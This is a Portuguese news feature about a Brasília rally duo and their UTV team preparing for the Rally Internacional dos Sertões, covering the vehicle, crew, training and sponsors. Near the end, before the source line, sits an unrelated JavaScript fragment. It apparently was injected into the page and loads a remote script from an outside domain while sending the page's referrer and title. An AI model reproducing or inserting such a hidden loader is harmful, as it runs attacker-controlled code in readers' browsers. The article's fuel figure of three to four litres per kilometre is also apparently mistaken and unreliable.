Esforço pelo primeiro lugar

 

_DSC0003
Elson Meneses é o responsável por preparar e checar todos os equipamentos para uma navegação segura

Elson Cascão II e o navegador Elson Meneses, com experiência de 13 anos nesse tipo de disputa, prometem lutar, ou melhor, correr, pela primeira colocação na 24ª edição do Rally Internacional dos Sertões – que começará dia 3 de setembro em Goiânia, passará pela Bahia e terminará em Palmas (TO), no dia 10. “Adoro essa adrenalina. Enquanto todo mundo procura um lugar tranquilo para férias, eu participo do rally para desestressar” diz Cascão.

Aos 56 anos, Elson Cascão II lembra como envolveu-se com o automobilismo e as corridas ainda criança. Cascão pai, dono de uma rede de postos de combustíveis da capital, patrocinava os Mil KM de Brasília nas décadas de 60 e 70. No início dos anos 60 a corrida acontecia nas ruas da cidade e no início dos anos 70, com a inauguração do autódromo, passou a ter um novo circuito.

Acompanhando a trajetória de pilotos como Nelson Piquet e Pupo Moreno, Elsinho ajudava o pai. Aos 13 anos ganhou do pai de um amigo, um kart usado. Pronto. Ali começava uma nova história. Hoje, Cascão pai até sugeriu que o filho jogasse golfe, mas a adrenalina já faz parte da vida e do bem estar de Elsinho.

Não é diferente com Elson Meneses, 51. Apaixonado por carros, um dia resolveu conhecer uma prova do Rally dos Sertões. Nessa visita foi apresentado a Cascão. No ano seguinte se tornou seu mecânico, depois chefe de equipe e seis anos depois era o navegador da dupla.  Começaram participando na categoria carros.

Meneses conta que trabalha com localizadores e GPS de última geração, mas que ainda faz anotações nos mapas em papel, destacando que “como tudo pode acontecer, sempre é bom estar preparado para minimizar os riscos”.

_DSC0011
Carro que participará do rally 

Hoje eles estão com um Utility Task Vehicle, conhecido como UTV. Introduzida na competição em 2012, a categoria desse tipo de veículo é a que mais cresce no evento off-road. Um UTV consome, em média, três a quatro litros de combustível por quilômetro rodado. Assim, tem dois tanques, um com capacidade para 35 litros e o outro, 55. São preparados dois veículos iguais. Um roda pelo circuito e o outro fica no caminhão e funciona como uma espécie de estoque para reposição de peças.

A dupla integra a Kandangus Rally Team, equipe que está participando pela 14ª vez do Rally Internacional dos Sertões e que no ano passado foi a 4ª colocada na classificação geral entre todos os UTV´s. Experientes em cenários lindos e rotas hostis, percorrerão 2,9 mil Km com um novo UTV, o Polaris RZR XP Turbo, modelo 2016 em uma categoria diferente do ano passado, a UTV Pro, onde estão as melhores e mais experientes equipes.

Como é um carro sem pára-brisa, obriga que piloto e navegador a usarem capacete e óculos especiais durante a prova. Além de Cascão e Meneses, a Kandangus conta com mais dez pessoas entre mecânicos, motorista, cozinheiro e apoio que acompanha a dupla com um motorhome, um caminhão oficina e duas caminhonetes de apoio rápido.

Paralelamente ao preparo dos carros, equipamentos e estrutura de apoio, o planejamento prevê também o preparo e condicionamento físico do piloto e do navegador. Com trechos que variam de 150 a 500 km diários, a dupla enfrenta jornadas longas que podem chegar a 10 horas entre um ponto e outro. Poeira, forte calor ou muito frio, dias e madrugadas a fio por caminhos de asfalto e terra, associados ao cansaço e a adrenalina podem levar a dupla a exaustão. Cascão segue um programa específico para sua preparação física. Meneses traçou o seu a partir das rotinas de sua oficina. Os cinquentões da equipe brasiliense estão preparados e entre isotônicos, barrinhas de cereal e carbogel, conduzem seu UTV. O jantar? Ah, esse é caprichadamente preparado pelo cozinheiro da equipe, Bruno Cajado.

 

Investimento

 Disputar o Rally Internacional dos Sertões demanda um alto investimento. A utilização do UTV possibilitou uma redução de custos. A equipe estima investir R$ 300 mil, valor viabilizado pelos patrocinadores, que tem suas marcas estampadas no carro e em todos os veículos de apoio. No caso da Kandangus, a equipe conta com patrocínios de peso: IPIRANGA, CASCOL COMBUSTÍVEIS, MENESES OFF ROAD, CIA ATHLETICA e MR1.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário